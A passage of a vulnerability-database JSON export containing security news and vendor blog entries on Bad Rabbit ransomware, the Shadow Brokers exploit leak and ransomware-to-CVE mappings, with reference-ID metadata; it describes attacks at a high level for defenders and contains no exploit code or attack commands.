"2018-01-27T09:18:01", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": 
[], "cvss2": {}, "cvss3": {}}, {"id": "THN:2E043D9BAC04DEE81005124DD54A31E2", "type": "thn", "bulletinFamily": "info", "title": "Bad Rabbit Ransomware Uses Leaked 'EternalRomance' NSA Exploit to Spread", "description": "[![bad-rabbit-ransomware-attack](https://3.bp.blogspot.com/-33xGkI9Yvms/WfMOIMURfvI/AAAAAAAAujY/RWkoZ_nQhBEGoXHW7YNB3J8Cu1pwU7wzgCLcBGAs/s1600/bad-rabbit-ransomware-attack.png)](<https://3.bp.blogspot.com/-33xGkI9Yvms/WfMOIMURfvI/AAAAAAAAujY/RWkoZ_nQhBEGoXHW7YNB3J8Cu1pwU7wzgCLcBGAs/s1600/bad-rabbit-ransomware-attack.png>)\n\nA new widespread ransomware worm, known as \"[Bad Rabbit](<https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html>),\" that hit over 200 major organisations, primarily in Russia and Ukraine this week leverages a stolen NSA exploit released by the Shadow Brokers this April to spread across victims' networks. \n \nEarlier it was reported that this week's crypto-ransomware outbreak did not use any National Security Agency-developed exploits, neither [EternalRomance](<https://thehackernews.com/2017/04/window-zero-day-patch.html>) nor [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>), but a recent report from Cisco's Talos Security Intelligence revealed that the Bad Rabbit ransomware did use EternalRomance exploit. \n \n[NotPetya ransomware](<https://thehackernews.com/2017/06/petya-ransomware-attack.html>) (also known as ExPetr and Nyetya) that infected tens of thousands of systems back in June also leveraged the [EternalRomance exploit](<https://thehackernews.com/2017/07/petya-ransomware-decryption-key.html>), along with another NSA's leaked Windows hacking exploit EternalBlue, which was used in the [WannaCry ransomware](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) outbreak. \n \n\n\n### Bad Rabbit Uses EternalRomance SMB RCE Exploit\n\n \nBad Rabbit does not use EternalBlue but does leverage EternalRomance RCE exploit to spread across victims' networks. 
\n \n[Microsoft](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) and [F-Secure](<https://labsblog.f-secure.com/2017/10/26/following-the-bad-rabbit/>) have also confirmed the presence of the exploit in the Bad Rabbit ransomware. \n \nEternalRomance is one of many hacking tools allegedly belonging to the NSA's elite hacking team called Equation Group that were leaked by the infamous hacking group calling itself Shadow Brokers in April this year. \n \nEternalRomance is a remote code execution exploit that takes advantage of a flaw (CVE-2017-0145) in Microsoft's Windows Server Message Block (SMB), a protocol for transferring data between connected Windows computers, to bypass security over file-sharing connections, thereby enabling remote code execution on Windows clients and servers. \n \nAlong with EternalChampion, EternalBlue, EternalSynergy and other NSA exploits released by the Shadow Brokers, the EternalRomance vulnerability was also patched by Microsoft this March with the release of a security bulletin ([MS17-010](<https://thehackernews.com/2017/04/window-zero-day-patch.html>)). \n \nBad Rabbit was reportedly distributed via drive-by download attacks via compromised Russian media sites, using a fake Adobe Flash player installer to lure victims into installing malware unwittingly, and demanding 0.05 bitcoin (~ $285) from victims to unlock their systems. \n \n\n\n### How Bad Rabbit Ransomware Spreads In a Network\n\n \nAccording to the researchers, [Bad Rabbit](<https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html>) first scans the internal network for open SMB shares, tries a hardcoded list of [commonly used credentials](<https://pastebin.com/01C05L0C>) to drop malware, and also uses the [Mimikatz](<https://github.com/gentilkiwi/mimikatz>) post-exploitation tool to extract credentials from the affected systems. 
\n \nBad Rabbit can also exploit the Windows Management Instrumentation Command-line (WMIC) scripting interface in an attempt to execute code on other Windows systems on the network remotely, [noted](<https://www.endgame.com/blog/technical-blog/badrabbit-technical-analysis>) EndGame. \n \nHowever, according to Cisco's Talos, Bad Rabbit also carries code that uses EternalRomance, which allows remote hackers to propagate from an infected computer to other targets more efficiently. \n \n\n\n> \"We can be fairly confident that BadRabbit includes an EternalRomance implementation used to overwrite a kernel\u2019s session security context to enable it to launch remote services, while in Nyetya it was used to install the DoublePulsar backdoor,\" Talos researchers wrote.\n\n> \"Both actions are possible due to the fact that EternalRomance allows the attacker to read/write arbitrary data into the kernel memory space.\"\n\n \n\n\n### Is Same Hacking Group Behind Bad Rabbit and NotPetya?\n\n \nSince both Bad Rabbit and NotPetya use the commercial [DiskCryptor](<https://thehackernews.com/2017/08/locky-mamba-ransomware.html>) code to encrypt the victim's hard drive and \"[wiper](<https://thehackernews.com/2017/06/petya-ransomware-wiper-malware.html>)\" code that could erase hard drives attached to the infected system, the researchers believe it is \"highly likely\" that the attackers behind both ransomware outbreaks are the same. \n \n\n\n> \"It is highly likely that the same group of hackers was behind BadRabbit ransomware attack on October the 25th, 2017 and the epidemic of the NotPetya virus, which attacked the energy, telecommunications and financial sectors in Ukraine in June 2017,\" Russian security firm Group IB [noted](<https://www.group-ib.com/blog/reportbadrabbit>).\n\n> \"Research revealed that the BadRabbit code was compiled from NotPetya sources. 
BadRabbit has same functions for computing hashes, network distribution logic and logs removal process, etc.\"\n\n \nNotPetya has previously been linked to the Russian hacking group known as BlackEnergy and Sandworm Team, but since Bad Rabbit is primarily targeting Russia as well, not everyone seems convinced by the above assumptions. \n \n\n\n### How to Protect Yourself from Ransomware Attacks?\n\n \nIn order to protect yourself from Bad Rabbit, users are advised to disable the WMI service to prevent the malware from spreading over your network. \n \nAlso, make sure to update your systems regularly and keep a good and effective anti-virus security suite on your system. \n \nSince most ransomware spreads through phishing emails, malicious adverts on websites, and third-party apps and programs, you should always exercise caution before falling for any of these. \n \nMost importantly, to always keep a tight grip on your valuable data, keep a good backup routine in place that makes and saves copies of your files to an external storage device that isn't always connected to your PC.\n", "published": "2017-10-26T23:57:00", "modified": "2017-10-27T10:57:11", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://thehackernews.com/2017/10/bad-rabbit-ransomware.html", "reporter": "Mohit Kumar", "references": [], "cvelist": ["CVE-2017-0145"], "lastseen": "2018-01-27T09:17:30", "history": [], "viewCount": 32, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2018-01-27T09:17:30", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", 
"idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": 
"openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2018-01-27T09:17:30", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.thn.ThnBulletin", "_object_types": ["robots.models.thn.ThnBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "qualysblog": [{"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blog.qualys.com/securitylabs/2017/04/15/the-shadow-brokers-release-zero-day-exploit-tools", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "history": [], "modified": "2017-04-15T07:11:21", "lastseen": "2017-05-01T13:43:00", "published": "2017-04-15T07:11:21", "description": "On Friday, a hacker group known as [The Shadow Brokers](<https://en.wikipedia.org/wiki/The_Shadow_Brokers>) publicly released a large number of functional exploit tools. Several of these tools make use of zero-day vulnerabilities, most of which are in Microsoft Windows. Exploiting these vulnerabilities in many cases leads to remote code execution and full system access.\n\nBoth end-of-support and current Windows versions are impacted, including Windows 2003, XP, Vista, 7, 2008, 8, and 2012. [Microsoft has released patches](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>) for each vulnerability across all supported platforms, but will not be releasing patches for end-of-support versions of Windows. 
It is highly recommended that any end-of-support Windows systems be replaced or isolated, as these systems will often be impacted by new vulnerabilities, without the availability of a patch.\n\nFor zero-day vulnerabilities in Operating Systems, you can use your existing asset inventory information from [Qualys AssetView](<https://www.qualys.com/suite/assetview/>), and search for any OS to determine how many vulnerable assets are deployed. This can be done without additional scanning if the data is relatively fresh.\n\n### Detecting the Vulnerabilities\n\nQualys has released five new QIDs to detect these zero-day vulnerabilities:\n\n * 91361 Microsoft Windows SMBv3 Remote Code Execution - Shadow Brokers (ETERNALSYNERGY) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91359 Microsoft Windows Remote Privilege Escalation - Shadow Brokers (ETERNALROMANCE) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91360 Microsoft Windows SMBv1 and NBT Remote Code Execution - Shadow Brokers (ETERNALBLUE) [_MS17-010_](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)\n\n * 91357 Microsoft Windows SMBv1 Remote Code Execution - Shadow Brokers (ETERNALCHAMPION) [_CVE-2017-0146_](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146>) &amp; [_CVE-2017-0147_](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0147>)\n\n * 53007 IBM Lotus Domino Remote Code Execution - Shadow Brokers (EWORKFRENZY)\n\nWe are also updating the QID we mentioned in a [previous blog post](<https://blog.qualys.com/securitylabs/2017/03/31/microsoft-iis-6-0-buffer-overflow-zero-day>) to include the Shadow Brokers exploit name:\n\n * 87284 Microsoft Internet Information Services 6.0 Buffer Overflow Vulnerability - Shadow Brokers (EXPLODINGCAN)\n\nThese new QIDs are used by [Qualys Vulnerability 
Management](<https://www.qualys.com/suite/vulnerability-management/>) to detect the vulnerabilities using an authenticated scan or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\n[Qualys ThreatPROTECT](<https://www.qualys.com/suite/threatprotect/>) provides one-click access to a list of impacted assets though the Live Feed, as well as a detailed analysis of The Shadow Brokers' leak, written directly by a vulnerability researcher.\n\n![Screen Shot 2017-03-31 at 4.39.54 PM](https://blog.qualys.com/wp-content/uploads/2017/03/Screen-Shot-2017-03-31-at-4.39.54-PM-300x182.png)\n\n### Tracking and Managing Windows Assets\n\n[Qualys AssetView](<https://www.qualys.com/suite/assetview/>) can help you locate and track legacy and current Windows assets in dynamic widgets. These widgets can be clicked to get full lists of Windows assets, grouped by Operating System, and the lists can be exported for sending to remediation or evergreening teams.\n\n![Screen Shot 2017-04-14 at 9.01.38 PM](https://blog.qualys.com/wp-content/uploads/2017/03/Screen-Shot-2017-04-14-at-9.01.38-PM-660x245.png)\n\n### Blocking Exploits\n\n[Qualys Web Application Firewall (WAF)](<https://www.qualys.com/suite/web-application-firewall/>) can block any attempts to exploit the \"EXPLODINGCAN\" vulnerability if upgrading or disabling WebDAV is not an option. Full details are posted here: [Protect Against Critical IIS 6.0 Buffer Overflow vulnerability (CVE-2017-7269) with Qualys WAF](<https://blog.qualys.com/webappsec/2017/03/30/protect-against-critical-iis-6-0-buffer-overflow-vulnerability-cve-2017-7269-with-qualys-waf>).\n\n### Get Started Now\n\nTo start detecting and protecting against critical vulnerabilities, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>). 
All features described in this article are available in the trial.", "title": "The Shadow Brokers Release Zero Day Exploit Tools", "cvelist": ["CVE-2017-7269", "CVE-2017-0147", "CVE-2017-0146"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 339, "enchantments": {"score": {"value": 7.4, "vector": "NONE", "modified": "2017-05-01T13:43:00", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:6AB96156-E704-460D-9CB4-65F529E51D90", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-7269", "CVE-2017-0146"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0203", "CPAI-2017-0205", "CPAI-2017-0249"]}, {"type": "seebug", "idList": ["SSV:92834", "SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/IIS/IIS_WEBDAV_SCSTORAGEPATHFROMURL", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201785050", "MYHACK58:62201892204", "MYHACK58:62201784747", "MYHACK58:62201785000", "MYHACK58:62201785039", "MYHACK58:62201785397", "MYHACK58:62201784835", "MYHACK58:62201784836"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310140228", "OPENVAS:1361412562310811206", "OPENVAS:1361412562310810698"]}, {"type": "threatpost", "idList": ["THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:2086A75F024930F586197B1CF4B4B91A"]}, {"type": "packetstorm", 
"idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142471", "PACKETSTORM:146236", "PACKETSTORM:142060", "PACKETSTORM:142548", "PACKETSTORM:141997"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:41992", "EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41738"]}, {"type": "zdt", "idList": ["1337DAY-ID-27757", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27446", "1337DAY-ID-27786"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "canvas", "idList": ["IIS6_PROPFIND", "MS17_010"]}, {"type": "mskb", "idList": ["KB3197835", "KB4013389"]}, {"type": "cisa", "idList": ["CISA:D39D876E64786DC5F13FB718A4507342"]}, {"type": "thn", "idList": ["THN:129FB15A6EC81B3F21210807A7547381"]}, {"type": "securelist", "idList": ["SECURELIST:5B679E7779B8DC4B28B53545967190C4", "SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A"]}, {"type": "nessus", "idList": ["IIS6_WEBDAV_CVE-2017-7269.NASL", "700099.PRM", "SMB_NT_MS17_JUNE_XP_2003.NASL", "IIS6_WEBDAV_CVE-2017-7269_DIRECT.NASL", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10999"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", 
"SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0147", "MS:CVE-2017-0146"]}, {"type": "ics", "idList": ["ICSMA-17-215-01"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kitploit", "idList": ["KITPLOIT:7013881512724945934"]}], "modified": "2017-05-01T13:43:00", "rev": 2}}, "reporter": "Jimmy Graham", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "qualysblog", "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "hash": "c8cb2ddabac0ab9940255a91a6a20b3e", "type": "qualysblog", "bulletinFamily": "blog", "title": "The Rise of Ransomware", "description": "With most employees still working from remote locations, ransomware attacks have increased steadily since the early months of the Covid-19 pandemic. According to the FBI\u2019s 2020 Internet Crime Report 2400+ ransomware-related incidents in 2020 resulted in a loss of about 29 million dollars. These numbers are only getting worse and do not include damage from incidents not reported to the FBI.\n\nRansomware attacks affect various industries worldwide, and ransomware demands continue to increase. Some recent examples include:\n\n * [Conti Ransomware:](<https://us-cert.cisa.gov/ncas/alerts/aa21-265a>) Conti ransomware is spread using spear phishing campaigns through tailored emails that contain malicious attachments or malicious links and via stolen or weak Remote Desktop Protocol (RDP) credentials. 
\n * [Netfilm Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/05/12/nefilim-ransomware>): Nefilim ransomware is distributed through exposed Remote Desktop Protocol (RDP) setups by brute-forcing them and using other known vulnerabilities for initial access, such as Citrix gateway devices.\n * [REvil Ransomware:](<https://blog.qualys.com/product-tech/2021/07/08/kaseya-revil-ransomware-attack-cve-2021-30116-automatically-discover-and-prioritize-using-qualys-vmdr>) REvil is a ransomware family that operates as ransomware-as-a-service (RaaS), has been linked to GOLD SOUTHFIELD, a financially motivated group, and was first identified in April 2019 according to MITRE.\n * [DarkSide Ransomware](<https://blog.qualys.com/vulnerabilities-threat-research/2021/06/09/darkside-ransomware>) : DarkSide ransomware performs brute force attacks and exploits known vulnerabilities in the remote desktop protocol (RDP) to gain initial access. DarkSide ransomware, first seen in August 2020 and updated as v2.0 in March 2021, is associated with the DarkSide group and now often operates as RaaS.\n * [Michigan State University (May 2020)](<https://www.zdnet.com/article/michigan-state-university-hit-by-ransomware-gang/>) - The MSU administrators were given a week to pay an undisclosed ransom demand to decrypt their files. In case MSU officials refuse to pay or choose to restore backups, the cybercriminals were prepared to leak documents stolen from the university&#x27;s network on a special website the group is operating on the dark web.\n * [DearCry and Exchange vulnerabilities](<https://news.sophos.com/en-us/2021/03/15/dearcry-ransomware-attacks-exploit-exchange-server-vulnerabilities/>) - DearCry ransomware attacks exploited Microsoft Exchange Server vulnerabilities CVE-2021-26855 and CVE-2021-27065. These vulnerabilities were being widely exploited before patches were available. Forcing Microsoft to release out-of-band updates. 
\n * [Colonial Pipeline](<https://www.cnbc.com/2021/06/08/colonial-pipeline-ceo-testifies-on-first-hours-of-ransomware-attack.html>) - Colonial Pipeline was most likely target of ransomware attack due vulnerable, outdated version of Microsoft Exchange. Attackers potentially exploited these vulnerabilities, and as a result, Colonial Pipeline took its systems down to contain the threat, limiting gasoline supply to the east coast. \n\nAs seen above, industries ranging from education, manufacturing, electronics, research, health and more are impacted by ransomware.\n\nTo help organizations combat risks from ransomware, Qualys is introducing Ransomware Risk Assessment service. As outlined in [_our blog_](<https://blog.qualys.com/product-tech/2021/10/05/assess-risk-ransomware-attacks-qualys-research>), the Qualys Ransomware Risk Assessment &amp; Remediation service leverages the security intelligence which is curated by Qualys Research experts to map ransomware families to specific vulnerabilities, misconfigurations, and vulnerable software. The Qualys Ransomware Risk Assessment service enables organizations to:\n\n * Get a unified view into critical ransomware exposures such as internet-facing vulnerabilities and misconfigurations, insecure remote desktop gateways (RDP), as well as detection of risky software in datacenter environment along with alerting for assets missing anti-malware solutions. \n * Accelerate remediation of Ransomware exposure~~s~~ with zero-touch patching by continuously patching ransomware-vulnerabilities as they are detected. The remediation plan also enables proactive patching for prioritized software to help you keep software up to date. \n\n#### **Ransomware Infection Vectors**\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the most common means of infection are: \n\n * **Remote Desktop Protocol** (RDP) vulnerabilities: RDP allows individuals to see and control the system remotely. 
It is a very common practice in organizations as it provides easy access to systems remotely. Once cybercriminals have RDP access, they can deploy malicious software on the system, making it inaccessible to legitimate users unless the victim pays the demanded ransom. Shodan search shows currently open and potentially vulnerable RDP services on the internet, and you can buy RDP access for [as low as US$3](<https://www.bankinfosecurity.com/how-much-that-rdp-credential-in-window-a-10590>). \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/Picture1.png)\n\n * **Email phishing campaigns**: Email is a prevalent medium to get malware into the target environment. Cybercriminals use emails to send malicious links to deploy malware on recipients\u2019 machines. It allows cybercriminals to steal sensitive data without breaking through network security and is very common among cybercriminals. \n * **Software vulnerabilities**: Software vulnerabilities are even more prevalent than phishing. Client- and server-side vulnerabilities allow criminals to take advantage of security weaknesses in widely used software programs, gain control of victim systems, and deploy ransomware. Vulnerabilities in VPN systems such as Pulse Secure VPN and Fortinet are common targets as well.\n\n#### **Ransomware Attacks and Exact CVEs To Prioritize for Monitoring**\n\nAs mentioned above known vulnerabilities and weakness are one of the top infection vectors. \n\nQualys research team has performed extensive research on 36 prevalent ransomware families and have mapped them to 64 CVEs and the 247 QIDs that can detect them. The following is just a sample list of some of most widely used ransomware in the attacks along with the CVEs leveraged to infect systems. \n\n**Ransomware**| **Description**| **CVE (s)**| QID (s) \n---|---|---|--- \nConti | The Conti ransomware strain will not only encrypt important files but will also exfiltrate them to a location controlled by the attacker. 
This method of extortion-ware is used to force victims to pay the ransom in order to avoid the sensitive data from being leaked. Conti operators are known to use well-known hacking tools such as Mimikatz and Cobalt Strike leading up to the encryption of files | CVE-2020-1472, CVE-2021-34527, \nCVE-2017-0143, CVE-2017-0144, CVE-2017-0145 | 91680, \n91668, \n91785, \n91345, \n91360 \nTeslacrypt, PrincessLocker | TeslaCrypt ransomware was uploaded to VirusTotal in November 2014 but was more widely spread in early 2015 and continues to evolve. TeslaCrypt encrypts the files using AES-256 algorithm until the victim pays the ransom in either Bitcoin or Cash Cards. | CVE-2013-2551, CVE-2015-8651 | 168351, 168350, 124422, 168341, 168340, 100271, 124421 \nLocky, Cerber | Cerber ransomware is ransomware-as-a-service (RaaS), meaning an attacker can distribute the licensed copy of this ransomware over the internet and pay commissions to the developer. | CVE-2016-1019 | 256924, 256922, 177873, 176784, 296029, 296028, 170815, 170724, 170711, 170365, 256256, 170264, 236438, 170119, 256214, 170052, 276628, 236342, 157445, 169942, 169941, 169923, 276572, 169854, 169853, 176004, 196742, 196725, 370320, 276455, 175965, 168848, 168813, 168792, 168696, 168694, 168594, 100282, 124879, 124872 \nWannaCry, Badrabbit | The WannaCry ransomware \u2014 formally known as WanaCrypt0r 2.0 \u2014 spreads using an exploit called EternalBlue for a Windows OS vulnerability that Microsoft patched in March 2017. | CVE-2017-0145 | 91361, 91360, 91359, 91347, 91345 \nDearCRy, BlackKingdom | DearCry takes advantage of compromised Microsoft Exchange Servers with vulnerability CVE-2021-26855. When exploited, cybercriminals gain initial access to the Exchange Server and then install web shells. 
| CVE-2021-26855 | 50107, 50108 \n \n### Unified View of Critical Ransomware Risk Exposures\n\nIt is a daunting task to get a unified view of multiple critical ransomware exposures together such as internet-facing vulnerabilities, misconfigurations as well as unauthorized software. Qualys Ransomware Risk Assessment &amp; remediation service dashboard enables security teams to see all the internet-facing assets that are exposed to ransomware related vulnerability or misconfiguration and take needed actions in the most impactful way. It also enables users to measure and track their effectiveness at addressing vulnerabilities or misconfigurations before they are used for ransomware attacks. \n\n![](https://blog.qualys.com/wp-content/uploads/2021/09/qualys-ransomware-screenshot-1-1070x795.png)\n\nIn addition, organizations should implement a good cyber hygiene program to scan vulnerabilities, discovery misconfigurations regularly with sufficient detection capabilities such as QIDs enabled, as well as an efficient automated process to deploy important security patches on targeted assets quickly with the scalability needed. \n\n### Qualys Ransomware Risk Assessment &amp; Remediation Service\n\nQualys provides an all-in-one solution to discover, assess, prioritize, monitor, and patch critical vulnerabilities in real time and across your global hybrid-IT landscape. The following sections provide an overview of each of the critical components from Qualys product portfolio and how they can be uniquely valuable in the effort of combatting ransomware attacks. \n\n#### Detect your critical data assets &amp; monitor security blind-spots with CyberSecurity Asset Management (CSAM) \n\nEnables organizations to automatically discover every asset in their environment, including unmanaged assets appearing on the network, inventory all hardware and software, and classify and tag critical assets. 
\n\n#### Discover, Inventory and Categorize assets \n\nIt is important to know your blind spots to protect against ransomware. Use CSAM to discover all assets, including the ones that are exposed to the internet as well as unknown/unmanaged assets that are connecting to your network. \n\nCSAM automatically organizes your assets by their functional category by analyzing their hardware and installed software. Extends your inventory by incorporating key business information from your CMDB, such as status, environment, ownership, support groups, and business criticality.\n\n![](https://blog.qualys.com/wp-content/uploads/2021/10/Picture1.png)\n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. \n\n * Unauthorized software should be removed to quickly reduce unnecessary attack vectors. With CSAM you can easily define rules to monitor unauthorized software installations. \n * Identify assets missing required security software, such as Antivirus and Endpoint Protection. \n * Identify EOL/EOS software, which can be used as ransomware attack vectors. End-of-Support software is one of the first things hackers look to exploit because they know publishers are no longer providing security updates and patches. \n\n#### Monitor &amp; detect at-risk assets and applications - Assets missing Anti-virus, running unauthorized software \n\nCSAM enriches your asset inventory with in-context, relevant information to help you detect at-risk assets and applications. You can identify and set alerts for assets that are running unauthorized software or are not using anti-virus/endpoint security tools. 
